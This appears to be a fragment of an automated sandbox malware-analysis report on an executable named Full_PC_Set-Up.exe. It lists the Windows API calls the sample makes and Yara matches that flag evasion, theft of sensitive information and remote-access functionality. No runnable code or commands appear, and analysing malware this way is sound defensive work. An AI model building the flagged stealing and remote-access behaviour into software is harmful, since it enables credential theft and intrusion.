Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00299E20 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError, 0_2_00299E20
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002C1CA0 AllocateAndInitializeSid,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,FreeSid,GetTokenInformation,GetTokenInformation,_calloc,FreeSid,CloseHandle,GetTokenInformation,EqualSid,FreeSid,CloseHandle, 0_2_002C1CA0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: GetLocaleInfoA, 0_2_0039D105
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002DA760 GetFileType,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToDosDateTime, 0_2_002DA760
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038F75F __get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 0_2_0038F75F
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003D2A00 _memset,GetVersionExW, 0_2_003D2A00

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1878986975.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1878986975.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP